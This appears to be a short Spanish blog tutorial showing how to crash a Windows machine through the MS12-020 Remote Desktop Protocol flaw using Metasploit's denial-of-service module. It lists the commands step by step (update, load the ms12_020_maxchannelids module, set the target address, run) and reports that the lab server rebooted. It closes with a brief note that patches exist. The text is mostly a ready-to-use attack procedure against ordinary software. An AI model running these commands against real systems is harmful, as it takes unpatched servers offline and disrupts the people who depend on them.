Explotar vulnerabilidad RDP de Microsoft (MS12-020) con metasploit

 

Recientemente ha aparecido una vulnerabilidad que afecta a Windows y su implementación del protocolo RDP (Remote Desktop Protocol)

Como era previsible ya hay múltiples noticias con el exploit, pastebins…etc para explotar esta vulnerabilidad y como no podría faltar metasploit ya tiene incluido dicho exploit.
Lo primero tenemos que actualizar metasploit:
msfupdate
Una vez actualizamos. accedemos y cargamos el modulo.
Arrancamos:
msfconsole
Cargamos el modulo
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
Si queremos ver  la información del modulo
como podemos nos 2 dos opciones, la dirección y el puerto destino.  Lo añadimos:
set RHOST 192.168.1.198
y solo alta ejecutar el exploit.
run
Si observamos el sistema operativo el cual hemos realizado el ataque (En este caso Windows Server 2008 R2 ) vemos que se a reiniciado.
*NOTAS:
Decir que ya se encuentran todos los parches para solventar esta vulnerabilidad y es conveniente actualizar lo antes posible.
Mas información:

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *